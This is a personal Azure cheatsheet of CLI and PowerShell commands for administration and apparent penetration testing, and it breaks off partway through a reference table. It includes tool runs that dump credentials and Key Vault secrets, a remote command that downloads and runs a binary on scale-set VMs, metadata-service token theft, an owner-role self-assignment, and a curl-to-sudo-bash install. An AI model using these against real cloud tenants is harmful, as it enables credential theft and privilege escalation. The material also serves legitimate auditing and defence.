# Azure - Cheatsheet

Original Article - https://wiki.mutschlerhome.com/en/CheatSheets/AzureCheatsheet

# PowerShell Installation and Modules

# Install latest version of Azure CLI on Mac

```powershell
brew update && brew install azure-cli
```

[Original Article](https://wikipedia.mutschlerhome.com/attachments/31)

# Install latest version of Azure CLI on Linux

```
# YOLO
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```

Resources: [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt) [https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0)

# Install PowerShell

```
brew install --cask powershell-preview
```

Run a PowerShell terminal with:

```
pwsh-preview
```

# Update PowerShell

```powershell
brew update
brew upgrade powershell-preview --cask
```

# Uninstall PowerShell

```
brew uninstall --cask powershell-preview
sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell
```

Resource: [https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1](https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1)

# Install Azure PowerShell module

For the current user:

```
if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) {
    Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' +
      'Az modules installed at the same time is not supported.')
} else {
    Install-Module -Name Az -AllowClobber -Scope CurrentUser
}
```

Resource: [https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0)

# Setup the AzureRMAlias module

This will deal with incompatibilities with older scripts that use AzureRM:

```
Enable-AzureRmAlias
```

# List available modules

```powershell
Get-Module -ListAvailable
```

# Get authenticated in PowerShell

```powershell
Connect-AzAccount -AccountId <username>
```

# List commands in a module

```powershell
Get-Command -Module <module name>
```

# List functions in a module

```powershell
Get-Command -Module <module name> -Type Function
```

# Authenticate via the CLI

Run this command to get authenticated:

```
az login
```

This opens a web browser or prints a URL. Navigating to the URL prompts you for a code, which is shown in the command line. Paste it in, click Next, and select the proper account.

Resource: [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos)

# Info Gathering

# List subscriptions for authenticated account

```powershell
az account list
```

# Get tenant id

```powershell
az account list | jq '.[].tenantId'
```

# Get subscription id

**az cli:**

```
az account list | jq '.[].id'
```

**PowerShell:**

```
Get-AzSubscription
```

Resources:  
[Powershell docs](https://docs.microsoft.com/en-us/powershell/module/az.accounts/get-azsubscription?view=azps-5.5.0)  
[CLI docs](https://docs.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest)

# List tenants

```powershell
az account tenant list
```

# List Resource Groups by name

```
az group list | jq -r '.[].name'
```

Resource: [https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest)

# Set Subscription

**az cli:**

```
az account set -s <name or id>
```

**PowerShell (with PowerZure imported):**

```
Set-AzureSubscription -Id [Subscription ID]
```

Resources:  
[https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html](https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html)  
[https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default](https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default)

# List all VMs

```
az vm list
```

Resource: [https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest)

# Blob Storage

# General

List all storage accounts and output in a table format:

```
az storage account list -o table
```

List all storage accounts and get storage account names:

```
az storage account list -o json | jq -r '.[].name'
```

You can assign one of the account names to an env var if you’d like:

```
export AZURE_STORAGE_ACCOUNT=<storage account name from output>
```

# Get storage keys

If you set the env var:

```
az storage account keys list -n $AZURE_STORAGE_ACCOUNT
```

You can assign one of the keys to an env var if you’d like:

```
export AZURE_STORAGE_KEY='<your key from the output of the previous command>'
```

# List storage containers

```powershell
az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY"
```

# List storage container contents

```
az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY
```

Resource: [https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/](https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/)

# List blob names

```powershell
az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name'
```

# Azure Kubernetes (k8s)

# Get available versions of k8s in a region

```
REGION=westus2 # This will vary depending on the region you're using
az aks get-versions --location $REGION -o table
```

Resource: [https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet](https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet)

# List managed k8s clusters

```
az aks list
```

Resource: [https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest)

# Get Resource Group Name for clusters

```
AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup')
```

# Get Cluster Name

```
AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name')
```

# Configure kubectl

This is pretty awesome, good job Microsoft:

```
az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME
```

Resources:  
[https://www.reddit.com/r/kubernetes/comments/8ohxcz/how\_to\_connect\_kubectl\_to\_aks/](https://www.reddit.com/r/kubernetes/comments/8ohxcz/how_to_connect_kubectl_to_aks/)  
[https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster](https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster)

# Security Auditing

# ScoutSuite

[https://github.com/nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite) will generate an HTML report outlining various issues that exist in the configuration for a given account.

**Install:**

```
git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt
```

**Run:**

```
python scout.py azure --cli
```

Resources: [https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/](https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/)

# PowerZure

```
git clone git@github.com:hausec/PowerZure.git
cd PowerZure
pwsh-preview

# Authenticate
Connect-AzAccount

# Import PowerZure
# ipmo is shorthand for Import-Module
ipmo ./PowerZure.ps1

# If you have multiple subscriptions, set the one you want to target:
Set-AzureSubscription -Id [Subscription ID]

# Enumerate all roles
Get-AzureRole

# Enumerate resources the current user has access to
Get-AzureTargets

# Show info about current user
Show-AzureCurrentUser
```

Resources:  
[https://powerzure.readthedocs.io/en/latest/](https://powerzure.readthedocs.io/en/latest/)  
[Fix error when importing AzureADPreview](https://stackoverflow.com/questions/64792108/getting-error-could-not-load-file-or-assembly-system-windows-forms-at-import)  
[Fix missing modules](https://github.com/Azure/azure-docs-powershell-azuread/issues/189)

# Show all functions

```
powerzure -h
```

# Get help for a particular function

For example:

```
get-help Get-AzureTargets
```

# Get all content from all Key Vaults

```
Show-AzureKeyVaultContent -All
```

Resource:

[https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/](https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/)

# MicroBurst

```
git clone git@github.com:NetSPI/MicroBurst.git
cd MicroBurst

pwsh-preview

# Authenticate
Connect-AzAccount

# Import MicroBurst
ipmo ./MicroBurst.psm1

# Install module for Out-GridView
Install-Module Microsoft.PowerShell.GraphicalTools

# Show commands
Get-Command -Module MicroBurst

# Dump info from an Azure subscription
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzDomainInfo -folder MicroBurst -Verbose

# Look for creds or certificate stores in a number of places and dump them to secrets.txt
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt

# Dump Key Vault Keys and Secrets from an Azure subscription
# via Automation Accounts specifically
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzKeyVaultsAutomation -Verbose
```

Resources:  
[Where I found out about the tool initially](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)  
[Write output to a file](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/out-file?view=powershell-7.1)

# SkyArk

```
git clone https://github.com/cyberark/SkyArk
cd SkyArk
pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AzureStealth
```

Resource: [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)

# Create Azure Objects

# Create a new user

```powershell
New-AzureUser -Username 'test@test.com' -Password reallyAwesomePassword123!
```

# Azure AD

# List all applications

```powershell
az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'
```

# List all service principals

```powershell
az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'
```

# List all groups

```
az ad group list --output=json --query='[].{Group:displayName,Description:description}'
```

Resource: [https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/](https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/)

# VMSS

# View all VMSS in a subscription

Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat!

## CLI

```
az vmss list
```

# Get VMSS by name and associated resource group

```powershell
az vmss list | jq -r '.[] | "\(.name) \(.resourceGroup)"'
```

# List VMs in a VMSS

```
az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP
```

Resource: [https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest) [https://github.com/andyt530/az2tf/blob/master/scripts/295\_azurerm\_virtual\_machine\_scale\_set.sh](https://github.com/andyt530/az2tf/blob/master/scripts/295_azurerm_virtual_machine_scale_set.sh)

# Get computer name of VMs in a VMSS

```powershell
az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName'
```

# Run command in VM in a VMSS

This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with.

```
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $2' --parameters hello world
```

Run whoami:

```
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami'
```

Download and run a binary as a background job:

```
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget https://example.com/binary && chmod +x binary && ./binary &"'
```

Resources:

[https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0)  
[Run command on a VMSS instance](https://heranonazure.wordpress.com/2017/08/30/solution-change-vm-scale-set-ssh-key/)

# Metadata Service

# Get all instance metadata

```powershell
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01"
```

# Get access token

```
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com"
```

Resources:  
[Official docs](https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=linux)  
[Accessible endpoints](https://gist.github.com/nordineb/01d69b63d2daf01e61b116bee607c6b8)  
[Get access token](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)

# Request storage account token

```
# Get OAuth Token
TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -H Metadata:true | jq -r '.access_token')

# Get subscription id
SUB=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" | jq -r '.compute.subscriptionId')

# Get list of storage accounts
curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01"
```

Resource:

[Powershell script I used](https://gist.github.com/kfosaaen/2620f73690d2948efb2a31897e1f404e)

# Get AKS node IP

```
curl -s -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2017-08-01" | jq -r '.network.interface[].ipv4.ipAddress[].privateIpAddress'
```

Resource: [https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811](https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811)

# Roles

# Create new role assignment

This will try to assign the assignee the owner role:

```
az role assignment create --assignee <user or service principal> --role "owner"
```

Resource: [https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/](https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/)

# Features

# Show registered features in a table format

```powershell
az feature list -o table
```

# Find features associated w/ ContainerService

```
az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}"
```

Resource: [https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/](https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/)

# Azure Powershell Module Cheatsheet

<table id="bkmrk-%23-azure-product-azur"><thead><tr><th>\#</th><th>Azure Product</th><th>Azure CLI</th><th>Example CLI</th><th>PowerShell Module</th><th>Example PS</th></tr></thead><tbody><tr><td>1</td><td>Syntax</td><td>az</td><td> </td><td>PowerShell uses a verb-noun pair for the names of cmdlets</td><td> </td></tr><tr><td>2</td><td>Log in to Azure</td><td>[az login](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login)</td><td>az login -u <johndoe@contoso.com> -p VerySecret</td><td>[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)</td><td>Connect-AzAccount</td></tr><tr><td>3</td><td>Manage Azure subscription information</td><td>[az account](https://docs.microsoft.com/en-us/cli/azure/account)</td><td>az account list --o table</td><td>[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)</td><td>Get-AzSubscription</td></tr><tr><td>4</td><td>Manage private registries with Azure Container Registries</td><td>[az acr](https://docs.microsoft.com/en-us/cli/azure/acr?view=azure-cli-latest)</td><td>az acr list -g MyResourceGroup -o table</td><td>[Az.ContainerRegistry](https://docs.microsoft.com/en-us/powershell/module/az.containerregistry/?view=azps-4.3.0#container_registry)</td><td>Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup"</td></tr><tr><td>5</td><td>Manage Azure Container Services</td><td>[az acs](https://docs.microsoft.com/en-us/cli/azure/acs?view=azure-cli-lates)</td><td>az acs list-locations --subscription</td><td>[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#container_service?)</td><td>Get-AzContainerService -ResourceGroupName "myRG"</td></tr><tr><td>6</td><td>Manage Azure Active Directory</td><td>[az ad](https://docs.microsoft.com/en-us/cli/azure/ad?view=azure-cli-latest)</td><td>az ad group show 
--group</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#active_directory)</td><td>Get-AzADGroup -First 100</td></tr><tr><td>7</td><td>Manage Azure Advisor</td><td>[az advisor](https://docs.microsoft.com/en-us/cli/azure/advisor?view=azure-cli-latest)</td><td>az advisor recommendation list --category Performance</td><td>[Az.Advisor](https://docs.microsoft.com/en-us/powershell/module/az.advisor/get-azadvisorrecommendation?view=azps-4.4.0)</td><td>Get-AzAdvisorRecommendation -Category Performance</td></tr><tr><td>8</td><td>Manage Azure Kubernetes Services</td><td>[az aks](https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest)</td><td>az aks get-versions --location westus2</td><td>[Az.Aks](https://docs.microsoft.com/en-us/powershell/module/az.aks/get-azaksversion?view=azps-4.4.0)</td><td>Get-AzAksVersion -Location westus</td></tr><tr><td>9</td><td>Manage Azure Media Services resources</td><td>[az ams](https://docs.microsoft.com/en-us/cli/azure/ams?view=azure-cli-latest)</td><td>az ams account list --resource-group --subscription</td><td>[Az.Media](https://docs.microsoft.com/en-us/powershell/module/az.media/Get-AzMediaService?view=azps-4.4.0)</td><td>Get-AzMediaService -ResourceGroupName "myRG"</td></tr><tr><td>10</td><td>Manage App Configurations</td><td>[az appconfig](https://docs.microsoft.com/en-us/cli/azure/appconfig?view=azure-cli-latest)</td><td>az appconfig list -g MyResourceGroup</td><td>[Az.AppConfiguration](https://docs.microsoft.com/en-us/powershell/module/az.appconfiguration/?view=azps-4.4.0#app_configuration)</td><td>Get-AzAppConfigurationStore</td></tr><tr><td>11</td><td>Manage App Service plans</td><td>[az appservice](https://docs.microsoft.com/en-us/cli/azure/appservice?view=azure-cli-latest)</td><td>az appservice ase list</td><td>[Az.Websites](https://docs.microsoft.com/en-us/powershell/module/az.websites/get-azappserviceplan?view=azps-4.4.0)</td><td>Get-AzAppServicePlan -Location 
"West US"</td></tr><tr><td>12</td><td>Manage Azure Backups</td><td>[az backup](https://docs.microsoft.com/en-us/cli/azure/backup?view=azure-cli-latest)</td><td>az backup container show..</td><td>[Az.RecoveryServices](https://docs.microsoft.com/en-us/powershell/module/az.recoveryservices/?view=azps-4.4.0#recovery_services)</td><td>Get-AzRecoveryServicesBackupJob</td></tr><tr><td>13</td><td>Manage Azure Batch</td><td>[az batch](https://docs.microsoft.com/en-us/cli/azure/batch?view=azure-cli-latest)</td><td>az batch account list \[--resource-group\] \[--subscription\]</td><td>[Az.Batch](https://docs.microsoft.com/en-us/powershell/module/az.batch/?view=azps-4.4.0#batch)</td><td>Get-AzBatchAccount -AccountName "pfuller"</td></tr><tr><td>14</td><td>Manage Azure Billing</td><td>[az billing](https://docs.microsoft.com/en-us/cli/azure/billing?view=azure-cli-latest)</td><td>az billing period show --name --subscription</td><td>[Az.Billing](https://docs.microsoft.com/en-us/powershell/module/az.billing/?view=azps-4.4.0#billing)</td><td>Get-AzBillingInvoice -Latest</td></tr><tr><td>15</td><td>Manage Azure Content Delivery Networks</td><td>[az cdn](https://docs.microsoft.com/en-us/cli/azure/cdn?view=azure-cli-latest)</td><td>az cdn origin list</td><td>[Az.Cdn](https://docs.microsoft.com/en-us/powershell/module/az.cdn/?view=azps-4.4.0#cdn)</td><td>Get-AzCdnOrigin</td></tr><tr><td>16</td><td>Manage Azure Cognitive Services accounts</td><td>[az cognitiveservices](https://docs.microsoft.com/en-us/cli/azure/cognitiveservices?view=azure-cli-latest)</td><td>az cognitiveservices account list -g MyResourceGroup</td><td>[Az.CognitiveServices](https://docs.microsoft.com/en-us/powershell/module/az.cognitiveservices/?view=azps-4.4.0#cognitive_services)</td><td>Get-AzCognitiveServicesAccount</td></tr><tr><td>17</td><td>Manage Azure CLI configuration</td><td>[az configure](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-configure)</td><td>az configure 
--defaults group=myRG web=myweb vm=myvm</td><td>[Az.Accounts](https://learn.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-9.6.0&viewFallbackFrom=azps-4.3.0#accounts)</td><td>Set-AzContext -SubscriptionId "xxxx-xxxx-xxxx-xxxx"</td></tr><tr><td>18</td><td>Manage Azure Container Instances.</td><td>[az container](https://docs.microsoft.com/en-us/cli/azure/container?view=azure-cli-latest)</td><td>az container logs --name MyContainerGroup --resource-group MyResourceGroup</td><td>[Az.ContainerInstance](https://docs.microsoft.com/en-us/powershell/module/az.containerinstance/?view=azps-4.4.0#container_instances)</td><td>Get-AzContainerGroup -ResourceGroupName demo -Name mycontainer</td></tr><tr><td>19</td><td>Manage Azure Cosmos DB database</td><td>[az cosmosdb](https://docs.microsoft.com/en-us/cli/azure/cosmosdb?view=azure-cli-latest)</td><td>az cosmosdb list \[--resource-group\] \[--subscription\]</td><td>[Az.CosmosDB](https://docs.microsoft.com/en-us/powershell/module/az.cosmosdb/?view=azps-4.4.0#cosmos_db)</td><td>Get-AzCosmosDBAccount -ResourceGroupName {resourceGroupName} -Name</td></tr><tr><td>20</td><td>Manage ARM template deployment at subscription scope</td><td>[az deployment](https://docs.microsoft.com/en-us/cli/azure/deployment?view=azure-cli-latest)</td><td>az deployment group list -g testrg</td><td>[Az.DeploymentManager](https://docs.microsoft.com/en-us/powershell/module/az.deploymentmanager/?view=azps-4.4.0#deployment_manager)</td><td>Get-AzDeploymentManagerArtifactSource -InputObject $artifactSourceObject</td></tr><tr><td>21</td><td>Manage Azure Managed Disks</td><td>[az disk](https://docs.microsoft.com/en-us/cli/azure/disk?view=azure-cli-latest)</td><td>az disk list \[--resource-group\] \[--subscription\]</td><td>[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#vm_disks)</td><td>Get-AzDisk -ResourceGroupName 'ResourceGroup01' -DiskName 'Disk01'</td></tr><tr><td>22</td><td>Manage Data Lake 
Analytics</td><td>[az dla](https://docs.microsoft.com/en-us/cli/azure/dla?view=azure-cli-latest)</td><td>az dla account list \[--resource-group\] \[--subscription\]</td><td>[Az.DataLakeAnalytics](https://docs.microsoft.com/en-us/powershell/module/az.datalakeanalytics/?view=azps-4.4.0#data_lake_analytics)</td><td>Get-AzDataLakeAnalyticsAccount -Name "ContosoAdlAccount"</td></tr><tr><td>23</td><td>Manage Data Lake Store</td><td>[az dls](https://docs.microsoft.com/en-us/cli/azure/dls?view=azure-cli-latest)</td><td>az dls account list --resource-group myRG</td><td>[Az.DataLakeStore](https://docs.microsoft.com/en-us/powershell/module/az.datalakestore/?view=azps-4.4.0#data_lake_store)</td><td>Get-AzDataLakeStoreAccount -Name "ContosoADL"</td></tr><tr><td>24</td><td>Manage Azure Data Migration Service</td><td>[az dms](https://docs.microsoft.com/en-us/cli/azure/dms?view=azure-cli-latest)</td><td>az dms check-name --location westus2 --name MyService</td><td>[Az.DataMigration](https://docs.microsoft.com/en-us/powershell/module/az.datamigration/?view=azps-4.4.0#data_migration)</td><td>Get-AzDataMigrationProject -InputObject $myService</td></tr><tr><td>25</td><td>Manage Azure Event Grid</td><td>[az eventgrid](https://docs.microsoft.com/en-us/cli/azure/eventgrid?view=azure-cli-latest)</td><td>Get-AzEventGridDomain -ResourceGroup myRG -Name Domain1</td><td>[Az.EventGrid](https://docs.microsoft.com/en-us/powershell/module/az.eventgrid/?view=azps-4.4.0#event_grid)</td><td>az ams account list --resource-group --subscription</td></tr><tr><td>26</td><td>Manage Azure Event Hubs</td><td>[az eventhubs](https://docs.microsoft.com/en-us/cli/azure/eventhubs?view=azure-cli-latest)</td><td>az eventhubs eventhub list --resource-group myRG --namespace-name mynamespace</td><td>[Az.EventHub](https://docs.microsoft.com/en-us/powershell/module/az.eventhub/?view=azps-4.4.0#event_hub)</td><td>Get-AzEventHub -ResourceGroup myRG -NamespaceName MyNamespaceName</td></tr><tr><td>27</td><td>Manage 
resource provider features</td><td>[az feature](https://docs.microsoft.com/en-us/cli/azure/feature?view=azure-cli-latest)</td><td>az feature list</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/register-azresourceprovider?view=azps-4.4.0)</td><td>Register-AzResourceProvider -ProviderNamespace Microsoft.Network</td></tr><tr><td>28</td><td>Find commands</td><td>[az find](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-find)</td><td>az find "az storage"</td><td>[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)</td><td>Get-Command -Verb Get -Noun AzVM\* -Module Az.Compute</td></tr><tr><td>29</td><td>Manage function apps</td><td>[az functionapp](https://docs.microsoft.com/en-us/cli/azure/functionapp?view=azure-cli-latest)</td><td>az functionapp list --query "\[?state=='Running'\]"</td><td>[Az.Functions](https://docs.microsoft.com/en-us/powershell/module/az.functions/?view=azps-4.4.0#functions)</td><td>Get-AzFunctionApp</td></tr><tr><td>30</td><td>Manage resource groups and template deployments</td><td>[az group](https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest)</td><td>az group create -l westus -n myRG</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/register-azresourceprovider?view=azps-4.4.0)</td><td>Get-AzResourceGroup -Name "EngineerBlog"</td></tr><tr><td>31</td><td>Manage HDInsight resources.</td><td>[az hdinsight](https://docs.microsoft.com/en-us/cli/azure/hdinsight?view=azure-cli-latest)</td><td>az hdinsight list \[--resource-group\] \[--subscription\]</td><td>[Az.HDInsight](https://docs.microsoft.com/en-us/powershell/module/az.hdinsight/?view=azps-4.4.0#hdinsight)</td><td>Get-AzHDInsightCluster</td></tr><tr><td>32</td><td>Managed Service Identities.</td><td>[az identity](https://docs.microsoft.com/en-us/cli/azure/identity?view=azure-cli-latest)</td><td>az identity 
list-operations \[--subscription\]</td><td>[Az.ManagedServiceIdentity](https://docs.microsoft.com/en-us/powershell/module/az.managedserviceidentity/?view=azps-4.4.0#managed_service_identity)</td><td>Get-AzUserAssignedIdentity -ResourceGroupName PSRG -Name ID1</td></tr><tr><td>33</td><td>Manage custom virtual machine images.</td><td>[az image](https://docs.microsoft.com/en-us/cli/azure/image?view=azure-cli-latest)</td><td>az image builder show --name mytemplate --resource-group my-group</td><td>[Az.ManagedServiceIdentity](https://docs.microsoft.com/en-us/powershell/module/az.imagebuilder/?view=azps-4.4.0#vm_images)</td><td>Get-AzImageBuilderTemplate</td></tr><tr><td>34</td><td>Manage KeyVault</td><td>[az keyvault](https://docs.microsoft.com/en-us/cli/azure/keyvault?view=azure-cli-latest)</td><td>az keyvault list \[--resource-group\] \[--subscription\]</td><td>[Az.KeyVault](https://docs.microsoft.com/en-us/powershell/module/az.keyvault/?view=azps-4.4.0#key_vault)</td><td>Get-AzKeyVault</td></tr><tr><td>35</td><td>Manage Azure Kusto resources</td><td>[az kusto](https://docs.microsoft.com/en-us/cli/azure/kusto?view=azure-cli-latest)</td><td>az kusto cluster list --resource-group myRG</td><td>[Az.Kusto](https://docs.microsoft.com/en-us/powershell/module/az.kusto/?view=azps-4.4.0#kusto)</td><td>Get-AzKustoCluster -ResourceGroupName testrg</td></tr><tr><td>36</td><td>Manage Azure locks</td><td>[az lock](https://docs.microsoft.com/en-us/cli/azure/lock?view=azure-cli-latest)</td><td>az lock list</td><td>[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/get-azresourcelock?view=azps-4.4.0)</td><td>Get-AzResourceLock -ResourceGroupName "myRG" -AtScope</td></tr><tr><td>37</td><td>Manage assignments and definitions</td><td>[az managedservices](https://docs.microsoft.com/en-us/cli/azure/managedservices?view=azure-cli-latest)</td><td>az managedservices definition 
list</td><td>[Az.ManagedServices](https://docs.microsoft.com/en-us/powershell/module/az.managedservices/?view=azps-4.4.0#managed_services)</td><td>Get-AzManagedServicesAssignment</td></tr><tr><td>38</td><td>Manage Azure Maps</td><td>[az maps](https://docs.microsoft.com/en-us/cli/azure/maps?view=azure-cli-latest)</td><td>az maps account show --name MyMapsAccount --resource-group myRG</td><td>[Az.Maps](https://docs.microsoft.com/en-us/powershell/module/az.maps/?view=azps-4.4.0#maps)</td><td>Get-AzMapsAccount -ResourceGroupName myRG</td></tr><tr><td>39</td><td>Manage Azure Database for MariaDB servers</td><td>[az mariadb](https://docs.microsoft.com/en-us/cli/azure/mariadb?view=azure-cli-latest)</td><td>az mariadb db list -g testgroup -s testsvr</td><td>[Az.MariaDb](https://docs.microsoft.com/en-us/powershell/module/az.mariadb/?view=azps-4.4.0#database_for_mariadb)</td><td>Get-AzMariaDbServer</td></tr><tr><td>40</td><td>Manage the Azure Monitor Service.</td><td>[az monitor](https://docs.microsoft.com/en-us/cli/azure/monitor?view=azure-cli-latest)</td><td>az monitor action-group list \[--resource-group\] \[--subscription\]</td><td>[Az.Monitor](https://docs.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-3.8.0#monitor)</td><td>Get-AzActionGroup</td></tr><tr><td>41</td><td>Manage Azure Database for MySQL servers.</td><td>[az mysql](https://docs.microsoft.com/en-us/cli/azure/mysql?view=azure-cli-latest)</td><td>az mysql db list -g testgroup -s testsvr</td><td>[Az.MySql](https://docs.microsoft.com/en-us/powershell/module/az.mysql/?view=azps-4.4.0#database_for_mysql)</td><td>Get-AzMySqlServer</td></tr><tr><td>42</td><td>Manage Azure Network resources.</td><td>[az network](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest)</td><td>az network nic list --query 
